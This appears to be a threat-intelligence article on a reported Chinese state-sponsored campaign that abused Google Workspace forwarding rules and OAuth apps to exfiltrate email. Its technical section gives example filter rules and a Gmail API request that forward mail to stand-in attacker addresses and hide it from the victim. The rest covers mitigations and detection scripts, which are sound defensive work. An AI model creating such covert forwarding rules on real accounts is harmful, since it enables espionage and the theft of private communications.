Chinese Hackers Weaponized Google Workspace Email Rules

Chinese state-sponsored threat actors have developed a sophisticated email exfiltration technique that abuses legitimate Google Workspace email forwarding rules. The campaign targeted defense contractors and research institutions, automatically forwarding sensitive emails to attacker-controlled accounts while evading traditional security controls. This novel persistence mechanism operates within Google’s trusted infrastructure, making detection exceptionally challenging without specific visibility into email rule configurations.

Introduction

A recent espionage campaign attributed to Chinese advanced persistent threat (APT) groups has revealed a concerning evolution in email-based intelligence collection. Rather than relying on traditional malware or account compromise alone, these operators established covert persistence through Google Workspace’s native email filtering and forwarding capabilities. By manipulating legitimate administrative features, attackers created invisible data exfiltration channels that bypassed conventional security monitoring.

The campaign specifically targeted organizations involved in defense research, aerospace engineering, and emerging technologies development. Victims included contractors working on classified projects and academic institutions conducting sensitive research with dual-use applications. The operation demonstrates increasing sophistication in leveraging cloud platform features as offensive capabilities, representing a significant shift in tradecraft that security teams must urgently address.

This technique’s effectiveness stems from its abuse of trusted functionality. Security tools rarely flag email rule modifications as malicious activity, and forwarding rules can persist indefinitely even after initial compromise vectors are remediated. The attackers demonstrated patience and operational discipline, maintaining access for extended periods while minimizing detectable footprints.

Background & Context

Google Workspace (formerly G Suite) has become the email infrastructure backbone for millions of organizations worldwide, including government agencies, defense contractors, and research institutions. Its powerful automation features—designed to improve productivity—include sophisticated email filtering, labeling, and forwarding rules that users and administrators can configure through both the web interface and API access.

Chinese state-sponsored cyber espionage operations have historically prioritized intelligence collection from defense industrial base (DIB) organizations and academic research institutions. Previous campaigns like Cloud Hopper, APT10’s managed service provider attacks, and various supply chain compromises established patterns of targeting upstream technology providers and research partners to access downstream classified information.

The shift toward cloud-based email platforms created new opportunities for persistent access. Traditional on-premises Exchange servers offered attackers server-side rule manipulation, but cloud platforms like Google Workspace introduced additional complexity for both attackers and defenders. The centralized nature of cloud services means compromised credentials or OAuth tokens provide immediate access to powerful administrative APIs.

This particular campaign appears linked to broader efforts by multiple Chinese APT groups to collect intelligence on hypersonic weapons research, artificial intelligence development, semiconductor manufacturing, and quantum computing—all areas identified as strategic priorities in China’s national technology development plans. The targeting patterns align with known collection requirements from previous reporting on groups like APT41, Gallium, and various Ministry of State Security (MSS)-affiliated operators.

Technical Breakdown

The attack chain begins with initial access through credential harvesting, typically spearphishing emails built around a convincing pretext that link to pages cloning legitimate Google authentication interfaces and capturing usernames and passwords. In more sophisticated variants, attackers also harvested multi-factor authentication codes through real-time phishing proxies using frameworks like Evilginx2 or Modlishka.

Once authenticated, attackers immediately establish persistence through multiple Google Workspace features:

Email Forwarding Rules: Using Gmail’s filter functionality, attackers create rules matching broad criteria:

Matches: from:(*) 
Do this: Forward to attacker-controlled-email@external-domain.com

More sophisticated rules target specific keywords related to classified projects, contract numbers, or personnel names:

Matches: subject:(ITAR OR "controlled unclassified" OR CUI OR "export control")
Do this: Forward to exfil-account@gmail.com AND Mark as read AND Delete it

OAuth Token Abuse: Attackers register malicious OAuth applications with innocuous names like “Email Backup Service” or “Mobile Sync Helper,” requesting broad Gmail API permissions. Once users approve these applications, tokens provide persistent API access independent of password changes:

Scope: https://www.googleapis.com/auth/gmail.modify
Scope: https://www.googleapis.com/auth/gmail.settings.basic

API-Based Rule Creation: For stealth, attackers use Gmail API calls rather than web interface rule creation:

# Request body for the Gmail API users.settings.filters.create call
filter_content = {
    'criteria': {
        'from': 'senior-executive@targetorg.com'   # only mail from this sender
    },
    'action': {
        'forward': 'collection@attacker-infrastructure.com',  # forwarding target
        'removeLabelIds': ['UNREAD', 'INBOX']   # mark read and archive so the victim never sees it
    }
}

The rules often include actions to mark forwarded emails as read and move them to archived folders, reducing victim awareness. Some variants applied labels mimicking legitimate organizational classification markings, blending malicious rules among legitimate automation.

Attackers demonstrated operational security by using compromised Gmail accounts as intermediate collection points rather than obviously suspicious external domains. This technique leverages Google’s trusted infrastructure for the entire exfiltration chain, avoiding external email gateway scrutiny.

Impact & Risk Assessment

The campaign’s impact extends across multiple dimensions of organizational security. Most critically, the technique provides long-term access to sensitive communications without requiring persistent network presence or malware deployment. Organizations that detected and remediated initial compromise vectors likely remained compromised through email forwarding rules that survived incident response efforts.

Intelligence Loss: Affected defense contractors potentially exposed classified project communications, technical specifications, personnel security information, and contractual details. Research institutions leaked unpublished findings, grant proposals, and collaborative research data. The cumulative intelligence value likely spans multiple collection cycles and strategic technology areas.

Persistence Duration: Forensic analysis of several victims revealed email forwarding rules active for 18-24 months before detection. During this period, thousands of emails containing sensitive information were exfiltrated. The delayed detection resulted from security tool blind spots around email rule monitoring.

Lateral Movement Implications: Compromised email access enabled attackers to identify additional targets through organizational charts, project team communications, and supply chain relationships. Subsequent phishing campaigns leveraged legitimate email threads and contextual information only available through prior email access.

Compliance Violations: Organizations subject to International Traffic in Arms Regulations (ITAR), Controlled Unclassified Information (CUI) requirements, or Defense Federal Acquisition Regulation Supplement (DFARS) compliance likely experienced reportable incidents requiring disclosure to Department of Defense oversight bodies.

The technique’s risk profile remains elevated because the fundamental capability exists across all Google Workspace implementations. Any organization using Google Workspace faces exposure if security monitoring doesn’t include email rule auditing.

Vendor Response

Google’s Threat Analysis Group (TAG) identified the campaign through anomaly detection in email rule creation patterns and coordinated with affected organizations. The company issued security advisories through Workspace administrator channels and enhanced its built-in security features.

Google implemented several platform-level improvements:

  • Enhanced anomaly detection for email rule creation, particularly rules forwarding to external domains
  • Administrative alerts for bulk email forwarding rule deployment
  • Security Health dashboard warnings for accounts with active external forwarding rules
  • Improved OAuth consent screen warnings for applications requesting Gmail modification permissions

The company emphasized that the abused functionality represents legitimate features working as designed. Google’s position maintains that security responsibility is shared between the platform provider and organizational administrators who must implement appropriate monitoring and access controls.

Google recommended all Workspace administrators enable security alerts, review existing email forwarding rules across the organization, and implement context-aware access policies restricting rule creation based on user location and device posture.

Mitigations & Workarounds

Organizations must implement multi-layered controls to prevent and detect email rule abuse:

Administrative Controls:

  • Audit all existing email forwarding rules
  • Disable external email forwarding via the Workspace admin console:
    Apps > Google Workspace > Gmail > User Settings > Email forwarding > Disable forwarding to external addresses
  • Implement allowlists for approved external forwarding domains

OAuth Application Management:

  • Review connected applications for all users
  • Implement OAuth application allowlisting
  • Enable "Trust internal, domain-owned apps" only
  • Regularly audit API access scopes granted to third-party apps

Conditional Access Policies:

Configure context-aware access rules requiring additional authentication for sensitive actions:

  • Email rule creation from unrecognized locations: Require re-authentication
  • API access from new devices: Require admin approval
  • Forwarding rule modifications: Generate admin alert

Account Hardening:

  • Enforce hardware security key-based MFA for all accounts
  • Implement Advanced Protection Program for high-risk users
  • Enable login challenge for unusual activity
  • Require admin approval for OAuth grants requesting Gmail modification scopes

Organizations should prioritize disabling external email forwarding entirely unless specific business requirements exist, then implement allowlist-based exceptions with compensating controls.

Detection & Monitoring

Effective detection requires visibility into email rule configurations and API activity:

Gmail Audit Log Analysis:

Monitor Google Workspace audit logs for email setting modifications:

Event: gmail_setting_change
Category: EMAIL_SETTINGS
Type: FILTER_CREATED, FILTER_MODIFIED
Parameters: filter_action contains "FORWARD"

Suspicious Rule Patterns:

Alert on rules matching these characteristics:

  • Forwarding to external domains (non-organizational)
  • Rules that delete or archive after forwarding
  • Broad matching criteria (wildcard senders/subjects)
  • Rules created outside normal business hours
  • Bulk rule creation across multiple accounts
  • Rules created immediately following initial authentication
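The following triage script is an added example, not code from the article or from Google. It takes filter records in the shape the Gmail API returns from users.settings.filters.list (items with 'id', 'criteria' and 'action', the same structure as the filter_content body shown in the Technical Breakdown) and scores each against the suspicious-rule patterns listed above: forwarding to an unapproved external domain, hiding the forwarded mail (mark read, archive, trash), and catch-all criteria. The sample filters, the tenant domain and the forwarding allowlist are constructed for illustration.

```python
"""Triage Gmail filter resources for forwarding rules that look like exfiltration.

Added example for this article, not code from the original page or from Google.
The records mimic the resource shape returned by the Gmail API method
users.settings.filters.list (items with 'id', 'criteria' and 'action'); the
sample filters, domains and allowlist below are constructed for illustration.
"""
from __future__ import annotations

INTERNAL_DOMAINS = {"targetorg.com"}              # constructed: the tenant's own domains
ALLOWED_FORWARD_DOMAINS = {"partner.example"}     # constructed: approved external forwarding
HIDING_REMOVE = {"INBOX", "UNREAD"}               # archive / mark-as-read
HIDING_ADD = {"TRASH", "SPAM"}                    # delete or bury the message

SAMPLE_FILTERS = [
    {"id": "f1",  # benign label routing, no forwarding
     "criteria": {"from": "jira@targetorg.com"},
     "action": {"addLabelIds": ["Label_12"]}},
    {"id": "f2",  # catch-all forward to an external mailbox, hidden from the user
     "criteria": {"from": "*"},
     "action": {"forward": "collection@attacker-infrastructure.example",
                "removeLabelIds": ["UNREAD", "INBOX"]}},
    {"id": "f3",  # keyword-targeted forward, then trash
     "criteria": {"query": 'subject:(ITAR OR CUI OR "export control")'},
     "action": {"forward": "exfil-account@gmail.com",
                "addLabelIds": ["TRASH"]}},
    {"id": "f4",  # approved forward to an allowlisted partner domain
     "criteria": {"from": "alerts@targetorg.com"},
     "action": {"forward": "oncall@partner.example"}},
]


def forward_domain(action: dict) -> str | None:
    """Domain part of the filter's forwarding address, if it forwards at all."""
    addr = action.get("forward", "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None


def is_broad(criteria: dict) -> bool:
    """True when the criteria match essentially every message."""
    if not criteria:
        return True
    return any(str(v).strip(" ()") == "*" for v in criteria.values())


def triage_filter(flt: dict) -> list[str]:
    """Return the suspicious characteristics of one filter (empty list = clean)."""
    action = flt.get("action", {})
    criteria = flt.get("criteria", {})
    findings: list[str] = []
    dom = forward_domain(action)
    if dom is None:
        return findings                      # no forwarding: out of scope here
    if dom not in INTERNAL_DOMAINS and dom not in ALLOWED_FORWARD_DOMAINS:
        findings.append(f"forwards to unapproved external domain {dom}")
    hides = (HIDING_REMOVE & set(action.get("removeLabelIds", []))
             or HIDING_ADD & set(action.get("addLabelIds", [])))
    if hides:
        findings.append("hides forwarded mail: " + ", ".join(sorted(hides)))
    if is_broad(criteria):
        findings.append("broad criteria (matches all mail)")
    return findings


def triage_all(filters: list[dict]) -> dict[str, list[str]]:
    """Map filter id -> findings, for every filter that has at least one."""
    result: dict[str, list[str]] = {}
    for flt in filters:
        findings = triage_filter(flt)
        if findings:
            result[flt["id"]] = findings
    return result


if __name__ == "__main__":
    for fid, findings in triage_all(SAMPLE_FILTERS).items():
        print(fid, "->", "; ".join(findings))
```

Run it against the filters returned for each mailbox in the tenant and review anything it flags; the allowlist is what keeps an approved partner forward from being reported every quarter, so keep it short and under change control.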

API Activity Monitoring:

Track Gmail API calls for programmatic rule manipulation:

API Method: gmail.users.settings.filters.create
User Agent: Unusual or scripted clients
Source IP: Non-corporate network ranges
Volume: Multiple filter creations within short timeframes

OAuth Token Review:

Regularly audit OAuth tokens with Gmail modification permissions:

# Using GAM (Google Apps Manager)
gam all users show tokens
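An added example that serves both the OAuth Application Management mitigations and the token review above; it is not the article's code and not part of GAM. It takes a token inventory, flags every grant that carries a Gmail modification or settings scope to an app outside the approved client list, and then counts how many distinct users consented to each unapproved app, which is how a single "Mobile Sync Helper" rolled out across a department shows up. The records and the approved client id are constructed, and the field names are an assumption to map your own export onto.

```python
"""Flag OAuth grants carrying Gmail modification or settings scopes from apps
that are not on the approved list, and spot an unknown app consented to by
several users.

Added example for this article, not the page's code and not GAM's. The token
records are constructed; their field names are an assumption, so map the
columns of your own inventory (for example the output of `gam all users show
tokens`) onto them.
"""
RISKY_SCOPES = {
    "https://www.googleapis.com/auth/gmail.modify",
    "https://www.googleapis.com/auth/gmail.settings.basic",
    "https://www.googleapis.com/auth/gmail.settings.sharing",   # forwarding / delegation
    "https://mail.google.com/",                                 # full mailbox access
}
APPROVED_CLIENT_IDS = {"111111-corp-backup.apps.googleusercontent.com"}  # constructed allowlist

SAMPLE_TOKENS = [  # constructed records
    {"user": "alice@targetorg.com", "client_id": "111111-corp-backup.apps.googleusercontent.com",
     "display_text": "Corporate Backup", "scopes": ["https://www.googleapis.com/auth/gmail.modify"]},
    {"user": "bob@targetorg.com", "client_id": "999999-sync.apps.googleusercontent.com",
     "display_text": "Mobile Sync Helper",
     "scopes": ["https://www.googleapis.com/auth/gmail.settings.basic",
                "https://www.googleapis.com/auth/gmail.modify"]},
    {"user": "carol@targetorg.com", "client_id": "222222-cal.apps.googleusercontent.com",
     "display_text": "Calendar Widget", "scopes": ["https://www.googleapis.com/auth/calendar.readonly"]},
    {"user": "dave@targetorg.com", "client_id": "999999-sync.apps.googleusercontent.com",
     "display_text": "Mobile Sync Helper", "scopes": ["https://mail.google.com/"]},
    {"user": "erin@targetorg.com", "client_id": "999999-sync.apps.googleusercontent.com",
     "display_text": "Mobile Sync Helper", "scopes": ["https://www.googleapis.com/auth/gmail.readonly"]},
]


def risky_grants(tokens):
    """Grants with a risky Gmail scope issued to a client that is not approved."""
    out = []
    for tok in tokens:
        hit = RISKY_SCOPES & set(tok["scopes"])
        if hit and tok["client_id"] not in APPROVED_CLIENT_IDS:
            out.append({"user": tok["user"], "app": tok["display_text"],
                        "client_id": tok["client_id"], "scopes": sorted(hit)})
    return out


def users_per_unapproved_app(grants):
    """client_id -> number of distinct users who granted it a risky scope."""
    seen = {}
    for g in grants:
        seen.setdefault(g["client_id"], set()).add(g["user"])
    return {cid: len(users) for cid, users in seen.items()}


if __name__ == "__main__":
    grants = risky_grants(SAMPLE_TOKENS)
    for g in grants:
        print(f"{g['user']}: {g['app']} ({g['client_id']}) -> {', '.join(g['scopes'])}")
    print(users_per_unapproved_app(grants))
```

Read-only Gmail scopes are deliberately left out of RISKY_SCOPES: the article's technique needs the ability to create filters or change settings, and keeping the list tight keeps the review focused on grants that could actually plant a forwarding rule.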

Implement Security Information and Event Management (SIEM) correlation rules combining authentication anomalies with email rule creation events. Legitimate rule creation typically correlates with interactive web sessions, while API-based creation may indicate compromise.
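An added example of the correlation described above, not code from the article or from any SIEM vendor. It walks a time-ordered stream of sign-in and filter-change events for each actor and raises an alert when a forwarding rule appears shortly after a login from outside the corporate ranges, when a rule is created outside business hours, when the client is a scripted user agent rather than a browser, or when one actor changes several filters in a short window. The events and the corporate range are constructed, and their schema (ts, actor, type, ip, user_agent, filter_action) is an assumption to map a real Workspace audit export onto.

```python
"""Correlate sign-in events with Gmail filter changes to spot rules created
right after a suspicious authentication, outside business hours, by a scripted
client, or in bulk.

Added example for this article, not the page's own code. The event records are
constructed and use a simplified, assumed schema (ts, actor, type, ip,
user_agent, filter_action); map your own Workspace audit export onto it.
"""
from __future__ import annotations

import ipaddress
from datetime import datetime, timedelta

CORP_NETS = [ipaddress.ip_network("198.51.100.0/24")]   # constructed corporate range
SCRIPTED_UA_MARKERS = ("python-requests", "curl/", "go-http-client", "okhttp")
LOGIN_WINDOW = timedelta(minutes=10)     # filter created this soon after a login
BULK_WINDOW = timedelta(minutes=15)
BULK_THRESHOLD = 3                       # this many filter changes per actor in the window
BUSINESS_HOURS = range(8, 18)            # assumption: tenant works 08:00-18:00 UTC, Mon-Fri

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Chrome/122.0"
SAMPLE_EVENTS = [  # constructed; 2024-03-04 is a Monday
    {"ts": "2024-03-04T09:05:00Z", "actor": "bob@targetorg.com", "type": "login_success",
     "ip": "198.51.100.20"},
    {"ts": "2024-03-04T09:30:00Z", "actor": "bob@targetorg.com", "type": "FILTER_CREATED",
     "ip": "198.51.100.20", "user_agent": BROWSER_UA, "filter_action": "LABEL"},
    {"ts": "2024-03-04T02:13:10Z", "actor": "alice@targetorg.com", "type": "login_success",
     "ip": "203.0.113.7"},
    {"ts": "2024-03-04T02:14:02Z", "actor": "alice@targetorg.com", "type": "FILTER_CREATED",
     "ip": "203.0.113.7", "user_agent": "python-requests/2.31.0", "filter_action": "FORWARD"},
    {"ts": "2024-03-04T14:00:00Z", "actor": "carol@targetorg.com", "type": "FILTER_CREATED",
     "ip": "198.51.100.31", "user_agent": BROWSER_UA, "filter_action": "FORWARD"},
    {"ts": "2024-03-04T14:02:00Z", "actor": "carol@targetorg.com", "type": "FILTER_CREATED",
     "ip": "198.51.100.31", "user_agent": BROWSER_UA, "filter_action": "FORWARD"},
    {"ts": "2024-03-04T14:05:00Z", "actor": "carol@targetorg.com", "type": "FILTER_CREATED",
     "ip": "198.51.100.31", "user_agent": BROWSER_UA, "filter_action": "FORWARD"},
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def is_corporate(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CORP_NETS)


def outside_business_hours(ts: datetime) -> bool:
    return ts.weekday() >= 5 or ts.hour not in BUSINESS_HOURS


def correlate(events: list[dict]) -> list[dict]:
    """Return one alert per filter change that matches at least one pattern."""
    logins: dict[str, list[tuple[datetime, str]]] = {}
    recent_changes: dict[str, list[datetime]] = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, actor = parse_ts(ev["ts"]), ev["actor"]
        if ev["type"] == "login_success":
            logins.setdefault(actor, []).append((ts, ev["ip"]))
            continue
        if ev["type"] not in ("FILTER_CREATED", "FILTER_MODIFIED"):
            continue
        reasons = []
        if ev.get("filter_action") == "FORWARD":
            for login_ts, login_ip in logins.get(actor, []):
                if timedelta(0) <= ts - login_ts <= LOGIN_WINDOW and not is_corporate(login_ip):
                    secs = int((ts - login_ts).total_seconds())
                    reasons.append(f"forwarding rule {secs} s after login from non-corporate IP {login_ip}")
                    break
        if outside_business_hours(ts):
            reasons.append("created outside business hours")
        ua = ev.get("user_agent", "").lower()
        if any(marker in ua for marker in SCRIPTED_UA_MARKERS):
            reasons.append(f"scripted client: {ev['user_agent']}")
        window = [t for t in recent_changes.get(actor, []) if ts - t <= BULK_WINDOW]
        window.append(ts)
        recent_changes[actor] = window
        if len(window) >= BULK_THRESHOLD:
            reasons.append(f"{len(window)} filter changes within {BULK_WINDOW}")
        if reasons:
            alerts.append({"actor": actor, "ts": ev["ts"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["ts"], alert["actor"], "|", "; ".join(alert["reasons"]))
```

Bob's label-only rule from a corporate address during working hours produces nothing, Alice's rule stacks three reasons, and Carol's third forwarding rule trips only the bulk threshold. Tune the windows and the business-hours assumption to the tenant before turning this into a SIEM rule, and treat a multi-reason alert as the one to page on.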

Best Practices

Organizations should implement comprehensive email security programs addressing both technical controls and user awareness:

Security Architecture:

  • Deploy Cloud Access Security Broker (CASB) solutions with Google Workspace integration for enhanced visibility
  • Implement Data Loss Prevention (DLP) policies scanning outbound emails for sensitive content
  • Enable Google Workspace Enterprise Plus security features including advanced phishing protection
  • Configure Security Investigation Tool for email forensics capabilities

Operational Procedures:

  • Schedule quarterly email rule audits across all user accounts
  • Establish baseline expected email rule usage patterns
  • Create incident response playbooks specifically for email compromise scenarios
  • Implement separation of duties for email administrative functions

User Education:

  • Train users to recognize OAuth consent prompts requesting excessive permissions
  • Educate about credential phishing techniques targeting Google accounts
  • Establish clear procedures for reporting suspicious authentication requests
  • Conduct simulated phishing exercises including credential harvesting scenarios

Threat Intelligence Integration:

  • Monitor reporting on APT email-based persistence techniques
  • Integrate threat intelligence feeds identifying malicious OAuth applications
  • Participate in information sharing communities relevant to your sector
  • Subscribe to Google TAG threat reports and vendor security advisories

Organizations in defense, research, and technology sectors should consider enhanced security baselines exceeding standard Google Workspace configurations, including mandatory hardware token authentication and restricted API access.

Key Takeaways

  • Chinese APT groups successfully weaponized legitimate Google Workspace email forwarding features for long-term espionage
  • Email rule manipulation provides persistent access independent of password changes or malware removal
  • Traditional security tools often lack visibility into email rule configurations and modifications
  • Detection requires specific audit log monitoring and email rule inventory management
  • Organizations must balance productivity features against security requirements through risk-based controls
  • Cloud platform security requires understanding and monitoring native features that can be abused
  • Incident response procedures must include email rule review as standard compromise assessment practice
  • Defense-in-depth approaches combining technical controls, monitoring, and user awareness provide optimal protection

This campaign demonstrates that sophisticated threat actors continuously adapt tradecraft to exploit trusted platform features. Security programs must evolve beyond perimeter-focused defenses toward comprehensive visibility across cloud service configurations and user-enabled automation.
